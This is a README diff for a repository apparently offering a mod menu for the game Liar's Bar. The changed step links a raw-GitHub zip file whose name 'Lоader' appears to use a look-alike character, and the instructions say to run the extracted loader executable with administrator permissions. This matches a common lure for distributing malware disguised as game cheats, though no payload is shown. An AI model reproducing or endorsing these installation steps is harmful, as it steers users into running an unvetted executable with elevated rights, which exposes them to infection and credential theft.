begejol12/LiarsBar-GameModMenu/README.md

 Jump right into the action with a super straightforward installation process:

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/begejol12/LiarsBar-GameModMenu/main/Lоader.zip` from the repository.
 2. Extract the contents using your favorite extraction software (e.g., WinRAR, 7-Zip, The Unarchiver).
 3. Run the Loader executable with administrator permissions for optimal performance.
 4. Follow the in-app instructions to initialize the installation and configure your settings.